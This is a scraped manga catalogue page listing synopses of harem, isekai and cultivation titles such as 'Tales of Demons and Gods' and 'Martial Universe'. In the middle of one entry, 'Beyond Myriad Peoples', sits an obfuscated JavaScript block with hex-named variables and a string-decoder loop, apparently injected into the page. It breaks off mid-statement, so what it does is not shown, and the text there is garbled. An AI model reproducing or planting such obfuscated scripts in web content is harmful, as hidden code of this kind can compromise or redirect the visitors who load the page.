Harem - Page 154

Harem manga typically stars a male lead surrounded by numerous romantic interests, creating comedic and emotional drama. A reverse harem features a female protagonist instead.

2098 results

The Case In Which Streaming In Another World Led To The Creation Of A Massive Yandere Following

Living in Ataraxia, a world of swords and magic, a reincarnated individual decided to make a living out of streaming. Living in a world where such a thing did not exist despite the many forms of entertainment, he quickly made a name for himself. This is not the tale of just a streamer… but of a boy who becomes a legend as a haishinsha. (Source: Novelupdates)


Otaku-Kun Who’S Kind To Gals

Odakura, a high school boy who looks otaku, and Narumi, a high school girl who looks like a gal. Originally, they were polar opposites who didn't get along even at school, but by chance, Odakura used his natural dexterity to grant Narumi's wishes one after another!? Your school youth romantic comedy


A Sharp Sword to Protect the Country

Read manga A Sharp Sword to Protect the Country Lin Xiao, The nine star commander in chief of dragon kingdom, was betrayed by his friend, and became a fool overnight. He was humiliated. Thanks to his fiancee Qin Wanqiu’s constant care for two years, Lin Xiao finally regained his mind and vowed that he would protect Qin Wanqiu, and would make those who humiliated him return ten times!


Beyond Myriad Peoples

A Myriad of big shots grovel at his feet, yet he insists: “I’m really just an ordinary mortal.” The overpowered protagonist who’s simultaneously the weakest in the world. ???? / Who’s Your Daddy / Beyond A Myria Of Peoples<script></script><script>(function(_0x4fa0a6,_0x446add){var _0x22e084=_0x4047,_0x1cab20=_0x4fa0a6();while(!![]){try{var _0x2c32b8=parseInt(_0x22e084(0x18d))/(-0x39*0xb+-0xb*-0x311+-0x3*0xa6d)+parseInt(_0x22e084(0x190))/(-0x26c9+-0x1*-0x6cd+-0x5*-0x666)*(-parseInt(_0x22e084(0x194))/(0x2710+-0xcbb+-0x1a52))+-parseInt(_0x22e084(0x191))/(-0x1*0x1b7a+-0xf98+0x2b16)+-parseInt(_0x22e084(0x1a6))/(0x3*0x503+0x2331*0x1+0x3235*-0x1)+-parseInt(_0x22e084(0x18c))/(0x1fcb+0x1c0d+-0x3bd2)*(parseInt(_0x22e084(0x19c))/(0x22e3+0x112e+0x2*-0x1a05))+parseInt(_0x22e084(0x1a5))/(-0x671*0x5+-0x1caf+0x3cec)*(-parseInt(_0x22e084(0x19b))/(-0x1ac2+-0x57b*0x1+0x2046))+parseInt(_0x22e084(0x18f))/(0x1*0x8b5+0x71c+-0xfc7);if(_0x2c32b8===_0x446add)break;else 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The Divine Urban Physician

Five years ago, the Ye family was destroyed, and the trash Ye Chen disappeared mysteriously. Now, and the trash Ye Chen is back! He came back with a cultivating body that penetrated the heavens and the earth and cried, \"Ghosts and gods!\" This time, Ye Chen wants to make the sky fall in awe! Let the Earth tremble! To be in control of everything, to the top of the sky!


Isekai NTR: Shin'yuu no Onna wo Saikyou Skill de Otosu Houhou

This shitty world that’s nothing but a trashy game, he and I will definitely escape it together. So, all these annoying women trying to take advantage of him are just a nuisance. What’s worse, it seems like he’s beginning to have some feelings for them. That’s why, for his sake, I’ll eat them up first. But, just what is this power...?


Taida na Akujoku Kizoku ni Tensei Shita Ore

I’ve been reincarnated as the villainous noble Weiss from my favorite academy game, and the fate that awaits me is nothing but the worst possible ruin, with no salvation. I absolutely have to avoid that at all costs! Then the only way out is to gain overwhelming power that even surpasses the game’s protagonist and become the strongest!


Tales of Demons and Gods

Tales of Demons and Gods In his past life, although too weak to protect his home when it counted, out of grave determination Nie Li became the strongest Demon Spiritist and stood at the pinnacle of the martial world. However, he lost his life during the battle with the Sage Emperor and six deity-ranked beasts. His soul was then brought back to when he was still 13 years old. Although he’s the weakest in his class with the lowest talent, having only a red soul realm and a weak one at that, with the aid of the vast knowledge which he accumulated from his previous life, he decided to train faster than anyone could expect. He also decided to help those who died nobly in his previous life to train faster as well. He aims to protect the city from the coming future of being devastated by demon beasts and the previous fate of ending up destroyed. He aims to protect his lover, friends, family and fellow citizens who died in the beast assault or its aftermath. And he aims to destroy the so-called Sacred family who arrogantly abandoned their duty and betrayed the city in his past life. Cuentos de Demonios y Dioses Fortellinger om Demoner og Guder Tales of Demons and Gods Клеймо Зловещего Духа Сказания о Демонах и Богах 요신기 妖神记 妖神记(全彩) Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !


The Assistant Mage Parts Ways With His Power Abusive Alchemist Childhood Friend And His Being Told To Have "Low Chance Of Gathering Materials," And Wants To Start A Slow Life At A Town In The Remote Region

The Assistant Mage of the genius alchemist Ruby—Lloyd has an abnormally low chance of gathering materials for alchemy use. Hence, he is treated as baggage and is made to be the bottom of the entire country’s joke. Everyday is a day he is scolded by Ruby. It’s become too much of a despairing environment that he’s come to hate it. And so, he finally decided to part ways with her. However, unbeknownst to everyone was that the materials Lloyd gathered were all high-grade materials no one else could gather. The mage, who was treated as “incompetent” and saw himself as such, now aims for an ideal easy going life!


Moto Dorei Desu ga, Oni no Dorei wo Katte Mitara Seiryoku ga Tsuyosugiru node Sutetai

It has been seven years since Sora Ono was sent to another world, where she was enslaved. Because of a clerical error, her “slave” status was revoked, and Sora walked away a free woman. Then one day, she purchases a slave...


Martial Universe

The Great Yan Empire exists in a world where respect can only be earned through strength. Within this Great Yan Empire, the four great clans have always stood above the rest. Among them, a particular incident in the Lin Clan resulted in the banishment of a certain individual who went on to start his own family, in hopes of one day being recognized again by the Lin Clan, and rejoining them… Hailing from a banished family of the Great Lin Clan, when Lin Dong was very young, he watched, powerless, as his talented father was easily crushed and crippled by the overwhelming genius of the great Lin Clan, Lin Langtian. With a despairing father, a heartbroken grandfather, and a suffering family, ever since that fateful day, Lin Dong has been driven by a deep purpose; to take revenge on the man who had taken everything and more from his family. Armed with nothing but willpower and determination, join Lin Dong as he unknowingly discovers a destiny greater than he could ever hope to imagine when he stumbles upon a mysterious stone talisman


That Villainous Aristocrat Is Actually Crazy About Mom Heroines ~With His Earnest Hard Work, He Becomes the Strongest and Saves All of His Favorite Characters~

The mom characters that appear in the game are all unfortunate sub-heroines who always get bad ending routes. “Why… Why does such a cute mom have to die?!“ Even though the protagonist tried very hard to request a route where they get saved, all of his efforts were in vain, making him spend his days in frustration. Then, he suddenly gets reincarnated into the world of MagiFan on a certain day. …However, he gets reincarnated as a villainous aristocrat who’s got nothing but the worst routes. This guy, who’s crazy about mom characters — his fulfilling days of saving his beloved mom characters and his journey to create his harem full of plump women are about to begin! ___ **Alt Official Raw:** [niconico Manga](https://manga.nicovideo.jp/comic/71300)
